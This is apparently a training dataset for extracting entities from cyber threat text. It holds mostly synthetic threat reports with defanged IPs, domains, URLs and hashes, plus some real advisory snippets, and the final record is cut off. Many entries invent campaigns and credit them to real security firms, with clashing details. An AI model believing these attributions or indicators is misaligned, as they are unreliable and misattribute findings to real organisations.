{"text": "Huntress published a threat intelligence report linking Sandworm to a new campaign exploiting CVE-2023-34911 in Windows 11. The attackers deployed LockBit via LaZagne, establishing C2 communication with 170 [ . ] 163 [ . ] 71 [ . ] 185 and portalportal[.]club. A secondary payload was downloaded from hxxp://cache-cache[.]live/secure/token. The malware binary (SHA1: cc4104ce181c724cce3311449e0716e58c031730) was dropped to /var/tmp/dropper.ps1. Phishing emails were sent from verify@auth-check[ . ]org targeting enterprise users. A backup C2 server was identified at 192 [ . ] 254 [ . ] 151 [ . ] 67.", "spans": {"Organization: Huntress": [[0, 8]], "Vulnerability: CVE-2023-34911": [[94, 108]], "System: Windows 11": [[112, 122]], "Malware: LockBit": [[147, 154]], "Indicator: 170.163.71.185": [[203, 235]], "Indicator: portalportal.club": [[240, 259]], "Indicator: hxxp://cache-cache.live/secure/token": [[301, 339]], "Indicator: cc4104ce181c724cce3311449e0716e58c031730": [[367, 407]], "Indicator: verify@auth-check.org": [[477, 502]], "Indicator: 192.254.151.67": [[568, 600]]}, "info": {"id": "synth_v2_00129", "source": "defanged_augment"}}
{"text": "Password generation for compressed files takes place client-side with each device using a unique key in most scenarios . Citrix told Threatpost that this is indeed the same password-spraying attack it announced itself last week – but it wouldn't confirm the other details in Resecurity 's post , including the attribution . APT1 also used more generic names referencing topics like software : Most do n’t even do much besides Since the most common allowed domain is google-analytics[ . ]com ( 17 K websites )", "spans": {"Organization: Citrix": [[121, 127]], "Organization: Resecurity": [[275, 285]], "Indicator: google-analytics.com": [[466, 490]]}, "info": {"id": "cyberner_stix_train_002263", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Raccoon Stealer (SHA1: d17f9dff75d99b2294390956079810c867ac3a98). Upon execution on Ivanti Connect Secure, the sample creates /dev/shm/svchost.exe and injects into legitimate processes. Network analysis shows beaconing to 5 [ . ] 148 [ . ] 252 [ . ] 7 every 60 seconds and DNS queries to edgeapi[.]com. The second stage was fetched from hxxp://cache-cdn[ . ]xyz/collect and written to /etc/cron.d/chrome_helper.exe. The payload uses BITSAdmin-style techniques for defense evasion. A secondary hash (SHA1: 0536a3443eb1b7a8a363c4f71539ab3012994e1d) was extracted from the unpacked payload.", "spans": {"Malware: Raccoon Stealer": [[25, 40]], "Indicator: d17f9dff75d99b2294390956079810c867ac3a98": [[48, 88]], "System: Ivanti Connect Secure": [[109, 130]], "Indicator: 5.148.252.7": [[247, 276]], "Indicator: edgeapi.com": [[313, 326]], "Indicator: hxxp://cache-cdn.xyz/collect": [[362, 394]], "Indicator: 0536a3443eb1b7a8a363c4f71539ab3012994e1d": [[530, 570]]}, "info": {"id": "synth_v2_00563", "source": "defanged_augment"}}
{"text": "Rustix is a set of safe Rust bindings to POSIX-ish APIs. When using `rustix::fs::Dir` using the `linux_raw` backend, it's possible for the iterator to \"get stuck\" when an IO error is encountered. Combined with a memory over-allocation issue in `rustix::fs::Dir::read_more`, this can cause quick and unbounded memory explosion (gigabytes in a few seconds if used on a hot path) and eventually lead to an OOM crash of the application. The symptoms were initially discovered in hxxps://github[ . ]com/imsnif/bandwhich/issues/284. That post has lots of details of our investigation. Full details can be read on the GHSA-c827-hfw6-qwvm repo advisory. If a program tries to access a directory with its file descriptor after the file has been unlinked (or any other action that leaves the `Dir` iterator in the stuck state), and the implementation does not break after seeing an error, it can cause a memory explosion. As an example, Linux's various virtual file systems (e.g. `/proc`, `/sys`) can contain directories that spontaneously pop in and out of existence. Attempting to iterate over them using `rustix::fs::Dir` directly or indirectly (e.g. with the `procfs` crate) can trigger this fault condition if the implementation decides to continue on errors. An attacker knowledgeable about the implementation details of a vulnerable target can therefore try to trigger this fault condition via any one or a combination of several available APIs. If successful, the application host will quickly run out of memory, after which the application will likely be terminated by an OOM killer, leading to denial of service. This issue has been addressed in release versions 0.35.15, 0.36.16, 0.37.25, and 0.38.19. Users are advised to upgrade. There are no known workarounds for this issue.", "spans": {"Indicator: https://github.com/imsnif/bandwhich/issues/284.": [[475, 526]], "System: Linux": [[927, 932]], "Vulnerability: denial of service": [[1594, 1611]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-43806"}}
{"text": "Europol published a threat intelligence report linking Silk Typhoon to a new campaign exploiting CVE-2020-37651 in Progress Telerik. The attackers deployed DanaBot via PsExec, establishing C2 communication with 172[.]161[.]133[.]53 and relaystorage[ . ]dev. A secondary payload was downloaded from hxxps://update-relay[.]cc/api/v2/auth. The malware binary (SHA1: de6f0d7cdb38cc9940992b684cf5416222fee2e5) was dropped to /tmp/loader.exe. Phishing emails were sent from hr@account-update[ . ]xyz targeting enterprise users. A backup C2 server was identified at 62 [ . ] 135 [ . ] 202 [ . ] 34.", "spans": {"Organization: Europol": [[0, 7]], "Vulnerability: CVE-2020-37651": [[97, 111]], "System: Progress Telerik": [[115, 131]], "Malware: DanaBot": [[156, 163]], "Indicator: 172.161.133.53": [[211, 231]], "Indicator: relaystorage.dev": [[236, 256]], "Indicator: hxxps://update-relay.cc/api/v2/auth": [[298, 335]], "Indicator: de6f0d7cdb38cc9940992b684cf5416222fee2e5": [[363, 403]], "Indicator: hr@account-update.xyz": [[468, 493]], "Indicator: 62.135.202.34": [[559, 590]]}, "info": {"id": "synth_v2_00006", "source": "defanged_augment"}}
{"text": "Dragos detected a multi-stage attack chain. The initial phishing email from confirm@identity-verify[.]cc contained a link to hxxps://synccache[ . ]live/api/v2/auth. This redirected to hxxps://gatewayrelay[.]tech/login on secure-static[.]tech. A secondary email from support@login-portal[.]tech pointed to hxxp://sync-cloud[ . ]live/secure/token which delivered Latrodectus. The final payload callback was hxxp://auth-storage[.]live/secure/token resolving to 10[.]217[.]253[.]75 via edge-data[.]live.", "spans": {"Organization: Dragos": [[0, 6]], "Indicator: confirm@identity-verify.cc": [[76, 104]], "Indicator: hxxps://synccache.live/api/v2/auth": [[125, 163]], "Indicator: https://gatewayrelay.tech/login": [[184, 217]], "Indicator: secure-static.tech": [[221, 241]], "Indicator: support@login-portal.tech": [[266, 293]], "Indicator: http://sync-cloud.live/secure/token": [[305, 344]], "Malware: Latrodectus": [[361, 372]], "Indicator: http://auth-storage.live/secure/token": [[405, 444]], "Indicator: 10.217.253.75": [[458, 477]], "Indicator: edge-data.live": [[482, 498]]}, "info": {"id": "synth_v2_01800", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: REvil (MD5: 24d9f83b5f9a861987bb18010d2d5db8). Upon execution on Apache Struts, the sample creates C:\\Program Files\\Common Files\\beacon.dll and injects into legitimate processes. Network analysis shows beaconing to 192[.]84[.]115[.]216 every 60 seconds and DNS queries to edge-static[.]site. The second stage was fetched from hxxps://sync-cdn[.]site/callback and written to C:\\Windows\\Tasks\\winlogon.exe. The payload uses CrackMapExec-style techniques for defense evasion. A secondary hash (SHA256: 22c5e4505b5a736bc350dda15612e06d7c4057a1d7790acbf542cf8162e38cae) was extracted from the unpacked payload.", "spans": {"Malware: REvil": [[25, 30]], "Indicator: 24d9f83b5f9a861987bb18010d2d5db8": [[37, 69]], "System: Apache Struts": [[90, 103]], "Indicator: 192.84.115.216": [[240, 260]], "Indicator: edge-static.site": [[297, 315]], "Indicator: https://sync-cdn.site/callback": [[351, 383]], "Indicator: 22c5e4505b5a736bc350dda15612e06d7c4057a1d7790acbf542cf8162e38cae": [[524, 588]]}, "info": {"id": "synth_v2_00504", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Tenable identified a large-scale phishing operation. Emails originated from security@secure-verify[ . ]net and contact@document-share[.]link, spoofing legitimate services. Victims were directed to hxxp://cloud-cache[ . ]live/download/update.exe which hosted a credential harvesting page on secureportal[.]info. A secondary link hxxps://secure-gateway[ . ]cc/api/v2/auth delivered Qbot (SHA256: fa72486ad996d713efbc916c83c674d38b28c76e4e9302f5b72138bce159a4c8). The malware was saved to C:\\Users\\admin\\AppData\\Local\\Temp\\ntds.dit and established C2 with 10 [ . ] 230 [ . ] 237 [ . ] 227.", "spans": {"Organization: Tenable": [[26, 33]], "Indicator: security@secure-verify.net": [[102, 132]], "Indicator: contact@document-share.link": [[137, 166]], "Indicator: hxxp://cloud-cache.live/download/update.exe": [[223, 270]], "Indicator: secureportal.info": [[316, 335]], "Indicator: hxxps://secure-gateway.cc/api/v2/auth": [[354, 395]], "Malware: Qbot": [[406, 410]], "Indicator: fa72486ad996d713efbc916c83c674d38b28c76e4e9302f5b72138bce159a4c8": [[420, 484]], "Indicator: 10.230.237.227": [[579, 611]]}, "info": {"id": "synth_v2_00941", "source": "defanged_augment"}}
{"text": "Blog Post by Secureworks: Tracking Salt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2022-28965 against Cisco ASA deployments. The initial access vector involves spear-phishing emails from info@account-update[ . ]xyz delivering Latrodectus. Post-compromise, the attackers deploy Qbot and use PowerShell Empire for reconnaissance. C2 infrastructure includes 172[.]93[.]250[.]54 and cachemail[ . ]online. A staging server at hxxps://data-node[.]club/callback hosts additional tooling. Key artifact: C:\\Windows\\System32\\chrome_helper.exe (SHA1: 3f45cf9f31e618ea1d4e6fcaf875a48b0b8ff6da).", "spans": {"Organization: Secureworks": [[13, 24]], "Vulnerability: CVE-2022-28965": [[127, 141]], "System: Cisco ASA": [[150, 159]], "Indicator: info@account-update.xyz": [[235, 262]], "Malware: Latrodectus": [[274, 285]], "Malware: Qbot": [[325, 329]], "Indicator: 172.93.250.54": [[403, 422]], "Indicator: cachemail.online": [[427, 447]], "Indicator: hxxps://data-node.club/callback": [[469, 502]], "Indicator: 3f45cf9f31e618ea1d4e6fcaf875a48b0b8ff6da": [[588, 628]]}, "info": {"id": "synth_v2_01596", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2022-22601 is a critical null pointer dereference affecting Apache Struts. Cisco Talos confirmed active exploitation by FIN7 in the wild. Exploitation delivers Conti (SHA256: 63b7c4bf2443db87111e346e8732c6aeb01454523abbeb0f63a765fe489e9bf0) which is dropped to C:\\Windows\\System32\\update.dll. The exploit payload is hosted at hxxps://cloudupdate[.]io/download/update.exe and communicates to 192[.]46[.]195[.]85 for C2.", "spans": {"Vulnerability: CVE-2022-22601": [[24, 38]], "Vulnerability: null pointer dereference": [[53, 77]], "System: Apache Struts": [[88, 101]], "Organization: Cisco Talos": [[103, 114]], "Malware: Conti": [[188, 193]], "Indicator: 63b7c4bf2443db87111e346e8732c6aeb01454523abbeb0f63a765fe489e9bf0": [[203, 267]], "Indicator: https://cloudupdate.io/download/update.exe": [[354, 398]], "Indicator: 192.46.195.85": [[419, 438]]}, "info": {"id": "synth_v2_00843", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Mandiant identified a large-scale phishing operation. Emails originated from service@urgent-notice[ . ]online and admin@phishing-domain[ . ]com, spoofing legitimate services. Victims were directed to hxxps://logincache[.]live/callback which hosted a credential harvesting page on apirelay[.]info. A secondary link hxxp://login-api[ . ]top/gate.php delivered Hive (MD5: 4a579523218349e21a46453fffc1d4df). The malware was saved to /tmp/winlogon.exe and established C2 with 10[.]116[.]187[.]243.", "spans": {"Organization: Mandiant": [[26, 34]], "Indicator: service@urgent-notice.online": [[103, 135]], "Indicator: admin@phishing-domain.com": [[140, 169]], "Indicator: https://logincache.live/callback": [[226, 260]], "Indicator: apirelay.info": [[306, 321]], "Indicator: http://login-api.top/gate.php": [[340, 373]], "Malware: Hive": [[384, 388]], "Indicator: 4a579523218349e21a46453fffc1d4df": [[395, 427]], "Indicator: 10.116.187.243": [[497, 517]]}, "info": {"id": "synth_v2_00855", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 192 [ . ] 25 [ . ] 224 [ . ] 205, the CISA IR team identified SystemBC running as /tmp/csrss.exe. The threat actor, believed to be Silk Typhoon, used CrackMapExec for credential harvesting and Havoc for lateral movement. Exfiltrated data was sent to edge-cdn[.]io and secure-auth[.]live. The initial dropper (SHA1: e456f6c6b5594c03d59550896f0af4f4f1da1383) was delivered via a phishing email from account@credential-check[ . ]site. A second C2 node was observed at 216[.]56[.]54[.]201, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\agent.py.", "spans": {"Indicator: 192.25.224.205": [[64, 96]], "Organization: CISA": [[102, 106]], "Malware: SystemBC": [[126, 134]], "Indicator: edge-cdn.io": [[314, 327]], "Indicator: secure-auth.live": [[332, 350]], "Indicator: e456f6c6b5594c03d59550896f0af4f4f1da1383": [[379, 419]], "Indicator: account@credential-check.site": [[461, 494]], "Indicator: 216.56.54.201": [[529, 548]]}, "info": {"id": "synth_v2_00278", "source": "defanged_augment"}}
{"text": ") Following is the snippet of code in these older Exodus One samples showing the connection to the Command & Control : Below is the almost identical composition of the request to the Command & Control server in mike.jar ( also containing the path 7e661733-e332-429a-a7e2-23649f27690f ) : To further corroborate the connection of the Exodus spyware with eSurv , the domain attiva[ . ]exodus[ . ]esurv[ . ]it resolves to the IP 212[.]47[.]242[.]236 which , according to", "spans": {"Malware: Exodus One": [[50, 60]], "Malware: Exodus spyware": [[333, 347]], "Indicator: 212.47.242.236": [[426, 446]], "Indicator: attiva.exodus.esurv.it": [[372, 406]]}, "info": {"id": "cyner_train_001312", "source": "defanged_augment"}}
{"text": "Cisco Talos detected a multi-stage attack chain. The initial phishing email from hr@phishing-domain[ . ]com contained a link to hxxp://edge-secure[.]top/callback. This redirected to hxxp://apiportal[.]top/login on cachegateway[ . ]link. A secondary email from helpdesk@document-share[ . ]link pointed to hxxps://relay-login[ . ]cc/assets/js/payload.js which delivered Amadey. The final payload callback was hxxp://login-portal[.]top/login resolving to 192[.]92[.]244[.]101 via api-update[ . ]io.", "spans": {"Organization: Cisco Talos": [[0, 11]], "Indicator: hr@phishing-domain.com": [[81, 107]], "Indicator: hxxp://edge-secure.top/callback": [[128, 161]], "Indicator: hxxp://apiportal.top/login": [[182, 210]], "Indicator: cachegateway.link": [[214, 235]], "Indicator: helpdesk@document-share.link": [[260, 292]], "Indicator: https://relay-login.cc/assets/js/payload.js": [[304, 351]], "Malware: Amadey": [[368, 374]], "Indicator: http://login-portal.top/login": [[407, 438]], "Indicator: 192.92.244.101": [[452, 472]], "Indicator: api-update.io": [[477, 494]]}, "info": {"id": "synth_v2_01797", "source": "defanged_augment"}}
{"text": "] databit [ . In late September 2015 Mofang used the website of Myanmar 's national airline hosted at www[ . ]flymna[ . ]com for an attack against an organization in Myanmar . The sample 832f5e01be536da71d5b3f7e41938cfb shares code with an older Aumlib variant with the hash cb3dcde34fd9ff0e19381d99b02f9692 . Based on our telemetry , we have identified an array of affected victims including US - based retailers , local governments , a university , and an engineering firm .", "spans": {"Indicator: 832f5e01be536da71d5b3f7e41938cfb": [[187, 219]], "Malware: Aumlib": [[246, 252]], "Indicator: cb3dcde34fd9ff0e19381d99b02f9692": [[275, 307]], "Organization: US - based retailers": [[393, 413]], "Organization: local governments": [[416, 433]], "Organization: university": [[438, 448]], "Organization: engineering firm": [[458, 474]], "Indicator: www.flymna.com": [[102, 124]]}, "info": {"id": "cyberner_stix_train_000017", "source": "defanged_augment"}}
{"text": "The first variant is a “ first stage application , ” that performs basic profiling of a device , and under certain conditions attempts to download and install a much more comprehensive surveillanceware component , which is the second variant . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations . ZxShell exploits this fact by cycling between each of the names , verifying the existence of the real service . Sometimes this was a high profile , legitimate site such as ‘ diplomacy[.]pl ’ hosting a ZIP archive .", "spans": {"Organization: embassies": [[297, 306]], "Malware: ZxShell": [[353, 360]], "Indicator: diplomacy.pl": [[527, 541]]}, "info": {"id": "cyberner_stix_train_007302", "source": "defanged_augment"}}
{"text": "hxxp://109[ . ]248[ . ]148[ . ]42/office/thememl/2012/main/attachedTemplate.dotm hxxp://109[.]248[.]148[.]42/officeDocument/2006/relationships/templates.dotm .", "spans": {"Indicator: http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm": [[0, 80]], "Indicator: http://109.248.148.42/officeDocument/2006/relationships/templates.dotm": [[81, 157]]}, "info": {"id": "cyberner_stix_train_005429", "source": "defanged_augment"}}
{"text": "IOC Bulletin - NjRAT Campaign:\nNetwork Indicators:\n- 168 [ . ] 198 [ . ] 197 [ . ] 159\n- 210 [ . ] 135 [ . ] 226 [ . ] 191\n- 172[.]181[.]122[.]71\n- syncstorage[.]top\n- login-sync[.]com\nURLs:\n- hxxps://proxysecure[ . ]cc/panel/index.html\n- hxxps://nodestatic[.]site/wp-content/uploads/doc.php\nEmail Senders:\n- report@mail-service[.]info\n- ceo@phishing-domain[.]com\nFile Indicators:\n- MD5: 0ebd7020e3a6195d650ab82a25eff750\n- SHA256: d63a9845502610f57557667604ca1985e4b6d7625fab6b216ac0a7c51b2db00c\n- Drop path: /var/tmp/sam.hive", "spans": {"Malware: NjRAT": [[15, 20]], "Indicator: 168.198.197.159": [[53, 86]], "Indicator: 210.135.226.191": [[89, 122]], "Indicator: 172.181.122.71": [[125, 145]], "Indicator: syncstorage.top": [[148, 165]], "Indicator: login-sync.com": [[168, 184]], "Indicator: hxxps://proxysecure.cc/panel/index.html": [[193, 236]], "Indicator: https://nodestatic.site/wp-content/uploads/doc.php": [[239, 291]], "Indicator: report@mail-service.info": [[309, 335]], "Indicator: ceo@phishing-domain.com": [[338, 363]], "Indicator: 0ebd7020e3a6195d650ab82a25eff750": [[388, 420]], "Indicator: d63a9845502610f57557667604ca1985e4b6d7625fab6b216ac0a7c51b2db00c": [[431, 495]]}, "info": {"id": "synth_v2_01346", "source": "defanged_augment"}}
{"text": "Mandiant published a threat intelligence report linking APT29 to a new campaign exploiting CVE-2026-35216 in Ivanti Connect Secure. The attackers deployed Emotet via PsExec, establishing C2 communication with 39 [ . ] 91 [ . ] 18 [ . ] 142 and syncapi[ . ]cc. A secondary payload was downloaded from hxxps://authnode[ . ]top/download/update.exe. The malware binary (SHA256: 12c326810190516e9550c4ee61afcc90622033f4aa2c01d7c911b03738b91e46) was dropped to C:\\Users\\admin\\AppData\\Local\\Temp\\lsass.dmp. Phishing emails were sent from info@credential-check[ . ]site targeting enterprise users. A backup C2 server was identified at 58[.]164[.]127[.]107.", "spans": {"Organization: Mandiant": [[0, 8]], "Vulnerability: CVE-2026-35216": [[91, 105]], "System: Ivanti Connect Secure": [[109, 130]], "Malware: Emotet": [[155, 161]], "Indicator: 39.91.18.142": [[209, 239]], "Indicator: syncapi.cc": [[244, 258]], "Indicator: hxxps://authnode.top/download/update.exe": [[300, 344]], "Indicator: 12c326810190516e9550c4ee61afcc90622033f4aa2c01d7c911b03738b91e46": [[374, 438]], "Indicator: info@credential-check.site": [[531, 561]], "Indicator: 58.164.127.107": [[627, 647]]}, "info": {"id": "synth_v2_00107", "source": "defanged_augment"}}
{"text": "IOC Bulletin - WarmCookie Campaign:\nNetwork Indicators:\n- 189[.]69[.]3[.]46\n- 25 [ . ] 170 [ . ] 96 [ . ] 130\n- 66 [ . ] 86 [ . ] 221 [ . ] 114\n- update-secure[ . ]org\n- static-cache[ . ]info\nURLs:\n- hxxps://cloudupdate[.]info/secure/token\n- hxxps://api-static[ . ]io/api/v2/auth\nEmail Senders:\n- support@auth-check[.]org\n- admin@credential-check[ . ]site\nFile Indicators:\n- SHA256: 22d153d3c1bc2cef017f4210f70b21b5e73c891d565aaf2ea05f346a2bfdaf16\n- MD5: fbb667b197451022c562843de98b9f5d\n- Drop path: /opt/app/bin/winlogon.exe", "spans": {"Malware: WarmCookie": [[15, 25]], "Indicator: 189.69.3.46": [[58, 75]], "Indicator: 25.170.96.130": [[78, 109]], "Indicator: 66.86.221.114": [[112, 143]], "Indicator: update-secure.org": [[146, 167]], "Indicator: static-cache.info": [[170, 191]], "Indicator: hxxps://cloudupdate.info/secure/token": [[200, 239]], "Indicator: https://api-static.io/api/v2/auth": [[242, 279]], "Indicator: support@auth-check.org": [[297, 321]], "Indicator: admin@credential-check.site": [[324, 355]], "Indicator: 22d153d3c1bc2cef017f4210f70b21b5e73c891d565aaf2ea05f346a2bfdaf16": [[383, 447]], "Indicator: fbb667b197451022c562843de98b9f5d": [[455, 487]]}, "info": {"id": "synth_v2_01439", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed SharpHound artifacts at /var/tmp/csrss.exe. Memory dump analysis confirmed execution of Nmap. Registry modifications pointed to persistence via C:\\ProgramData\\dropper.ps1. Network forensics identified connections to 78 [ . ] 48 [ . ] 104 [ . ] 24 and mail-node[.]tech. Email headers traced the initial vector to contact@auth-check[ . ]org. File C:\\Program Files\\Common Files\\ntds.dit (MD5: d0ff17410737c72764ae666de5d21d03) was identified as the initial dropper. A staging URL hxxps://mail-cloud[.]cc/admin/config resolved to 172[.]39[.]96[.]3. Secondary artifact hash: MD5: 51e75def40795f5ae388444a8a872b2a.", "spans": {"Indicator: 78.48.104.24": [[288, 318]], "Indicator: mail-node.tech": [[323, 339]], "Indicator: contact@auth-check.org": [[384, 410]], "Indicator: d0ff17410737c72764ae666de5d21d03": [[462, 494]], "Indicator: https://mail-cloud.cc/admin/config": [[549, 585]], "Indicator: 172.39.96.3": [[598, 615]], "Indicator: 51e75def40795f5ae388444a8a872b2a": [[647, 679]]}, "info": {"id": "synth_v2_01154", "source": "defanged_augment"}}
{"text": "Vulnerability in the Oracle WebCenter Sites product of Oracle Fusion Middleware (component: Advanced UI). The supported version that is affected is 12 [ . ] 2 [ . ] 1 [ . ] 3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data as well as unauthorized read access to a subset of Oracle WebCenter Sites accessible data. CVSS 3.0 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).", "spans": {"Indicator: 12.2.1.3": [[148, 174]], "Organization: Oracle": [[21, 27], [55, 61], [286, 292], [427, 433], [616, 622], [706, 712]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-2539"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 192 [ . ] 132 [ . ] 66 [ . ] 179, the Symantec IR team identified Amadey running as /dev/shm/winlogon.exe. The threat actor, believed to be Volt Typhoon, used PowerShell Empire for credential harvesting and ADFind for lateral movement. Exfiltrated data was sent to update-secure[.]xyz and auth-proxy[.]dev. The initial dropper (SHA256: 2b708c10e12547a7c3a2a29f6b7a26189d531916507afb7e5ea379fc6799ad98) was delivered via a phishing email from security@identity-verify[ . ]cc. A second C2 node was observed at 151[.]178[.]206[.]18, with a persistence mechanism writing to /var/tmp/helper.sh.", "spans": {"Indicator: 192.132.66.179": [[64, 96]], "Organization: Symantec": [[102, 110]], "Malware: Amadey": [[130, 136]], "Indicator: update-secure.xyz": [[329, 348]], "Indicator: auth-proxy.dev": [[353, 369]], "Indicator: 2b708c10e12547a7c3a2a29f6b7a26189d531916507afb7e5ea379fc6799ad98": [[400, 464]], "Indicator: security@identity-verify.cc": [[506, 537]], "Indicator: 151.178.206.18": [[572, 592]]}, "info": {"id": "synth_v2_00408", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwriteback: don't block sync for filesystems with no data integrity guarantees\n\nAdd a SB_I_NO_DATA_INTEGRITY superblock flag for filesystems that cannot\nguarantee data persistence on sync (eg fuse). For superblocks with this\nflag set, sync kicks off writeback of dirty inodes but does not wait\nfor the flusher threads to complete the writeback.\n\nThis replaces the per-inode AS_NO_DATA_INTEGRITY mapping flag added in\ncommit f9a49aa302a0 (\"fs/writeback: skip AS_NO_DATA_INTEGRITY mappings\nin wait_sb_inodes()\"). The flag belongs at the superblock level because\ndata integrity is a filesystem-wide property, not a per-inode one.\nHaving this flag at the superblock level also allows us to skip having\nto iterate every dirty inode in wait_sb_inodes() only to skip each inode\nindividually.\n\nPrior to this commit, mappings with no data integrity guarantees skipped\nwaiting on writeback completion but still waited on the flusher threads\nto finish initiating the writeback. Waiting on the flusher threads is\nunnecessary. This commit kicks off writeback but does not wait on the\nflusher threads. This change properly addresses a recent report [1] for\na suspend-to-RAM hang seen on fuse-overlayfs that was caused by waiting\non the flusher threads to finish:\n\nWorkqueue: pm_fs_sync pm_fs_sync_work_fn\nCall Trace:\n <TASK>\n __schedule+0x457/0x1720\n schedule+0x27/0xd0\n wb_wait_for_completion+0x97/0xe0\n sync_inodes_sb+0xf8/0x2e0\n __iterate_supers+0xdc/0x160\n ksys_sync+0x43/0xb0\n pm_fs_sync_work_fn+0x17/0xa0\n process_one_work+0x193/0x350\n worker_thread+0x1a1/0x310\n kthread+0xfc/0x240\n ret_from_fork+0x243/0x280\n ret_from_fork_asm+0x1a/0x30\n </TASK>\n\nOn fuse this is problematic because there are paths that may cause the\nflusher thread to block (eg if systemd freezes the user session cgroups\nfirst, which freezes the fuse daemon, before invoking the kernel\nsuspend. The kernel suspend triggers ->write_node() which on fuse issues\na synchronous setattr request, which cannot be processed since the\ndaemon is frozen. Or if the daemon is buggy and cannot properly complete\nwriteback, initiating writeback on a dirty folio already under writeback\nleads to writeback_get_folio() -> folio_prepare_writeback() ->\nunconditional wait on writeback to finish, which will cause a hang).\nThis commit restores fuse to its prior behavior before tmp folios were\nremoved, where sync was essentially a no-op.\n\n[1] hxxps://lore[ . ]kernel[ . ]org/linux-fsdevel/CAJnrk1a-asuvfrbKXbEwwDSctvemF+6zfhdnuzO65Pt8HsFSRw@mail.gmail.com/T/#m632c4648e9cafc4239299887109ebd880ac6c5c1", "spans": {"Indicator: https://lore.kernel.org/linux-fsdevel/CAJnrk1a-asuvfrbKXbEwwDSctvemF+6zfhdnuzO65Pt8HsFSRw@mail.gmail.com/T/#m632c4648e9cafc4239299887109ebd880ac6c5c1": [[2455, 2612]], "System: Linux kernel": [[7, 19]], "System: systemd": [[1810, 1817]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-31465"}}
{"text": "Microsoft MSRC detected a multi-stage attack chain. The initial phishing email from contact@secure-verify[.]net contained a link to hxxps://dataapi[.]cc/login. This redirected to hxxps://cacheproxy[ . ]live/assets/js/payload.js on authlogin[ . ]live. A secondary email from hr@phishing-domain[ . ]com pointed to hxxps://portal-data[ . ]tech/admin/config which delivered BlackCat. The final payload callback was hxxps://backup-login[.]live/download/update.exe resolving to 192[.]147[.]168[.]77 via cloud-secure[.]io.", "spans": {"Organization: Microsoft MSRC": [[0, 14]], "Indicator: contact@secure-verify.net": [[84, 111]], "Indicator: hxxps://dataapi.cc/login": [[132, 158]], "Indicator: hxxps://cacheproxy.live/assets/js/payload.js": [[179, 227]], "Indicator: authlogin.live": [[231, 249]], "Indicator: hr@phishing-domain.com": [[274, 300]], "Indicator: hxxps://portal-data.tech/admin/config": [[312, 353]], "Malware: BlackCat": [[370, 378]], "Indicator: hxxps://backup-login.live/download/update.exe": [[411, 458]], "Indicator: 192.147.168.77": [[472, 492]], "Indicator: cloud-secure.io": [[497, 514]]}, "info": {"id": "synth_v2_01782", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Latrodectus Campaign:\nNetwork Indicators:\n- 192[.]43[.]50[.]103\n- 95[.]225[.]205[.]126\n- 193 [ . ] 204 [ . ] 190 [ . ] 210\n- gatewayportal[.]site\n- proxyportal[ . ]com\nURLs:\n- hxxps://update-node[.]top/admin/config\n- hxxps://cache-gateway[.]info/secure/token\nEmail Senders:\n- security@secure-verify[ . ]net\n- verify@auth-check[.]org\nFile Indicators:\n- SHA1: 1a69fa1df9c84cd5c8854e75f7b92a8da68083da\n- MD5: 2ef6bc7ac3d5b6d1862ed6a1320e4b96\n- Drop path: C:\\Users\\admin\\AppData\\Local\\Temp\\agent.py", "spans": {"Malware: Latrodectus": [[15, 26]], "Indicator: 192.43.50.103": [[59, 78]], "Indicator: 95.225.205.126": [[81, 101]], "Indicator: 193.204.190.210": [[104, 137]], "Indicator: gatewayportal.site": [[140, 160]], "Indicator: proxyportal.com": [[163, 182]], "Indicator: https://update-node.top/admin/config": [[191, 229]], "Indicator: https://cache-gateway.info/secure/token": [[232, 273]], "Indicator: security@secure-verify.net": [[291, 321]], "Indicator: verify@auth-check.org": [[324, 347]], "Indicator: 1a69fa1df9c84cd5c8854e75f7b92a8da68083da": [[373, 413]], "Indicator: 2ef6bc7ac3d5b6d1862ed6a1320e4b96": [[421, 453]]}, "info": {"id": "synth_v2_01418", "source": "defanged_augment"}}
{"text": "The library is an older version of the “ DWN_DLL_MAIN[.]dll ” ( md5: ce8b99df8642c065b6af43fde1f786a3 ) .", "spans": {"Indicator: DWN_DLL_MAIN.dll": [[41, 59]], "Indicator: ce8b99df8642c065b6af43fde1f786a3": [[69, 101]]}, "info": {"id": "cyberner_stix_train_007604", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed CrackMapExec artifacts at C:\\Users\\Public\\Documents\\update.dll. Memory dump analysis confirmed execution of Sliver. Registry modifications pointed to persistence via C:\\Program Files\\Common Files\\csrss.exe. Network forensics identified connections to 190[.]221[.]121[.]192 and static-cache[ . ]net. Email headers traced the initial vector to report@document-share[.]link. File /home/user/.config/winlogon.exe (MD5: 957c97c1ca25e1785d27696c248975cd) was identified as the initial dropper. A staging URL hxxp://storagelogin[.]com/portal/verify resolved to 84 [ . ] 155 [ . ] 61 [ . ] 201. Secondary artifact hash: MD5: 741e805361b89941c2bf2026ec7852c2.", "spans": {"Indicator: 190.221.121.192": [[323, 344]], "Indicator: static-cache.net": [[349, 369]], "Indicator: report@document-share.link": [[414, 442]], "Indicator: 957c97c1ca25e1785d27696c248975cd": [[487, 519]], "Indicator: http://storagelogin.com/portal/verify": [[574, 613]], 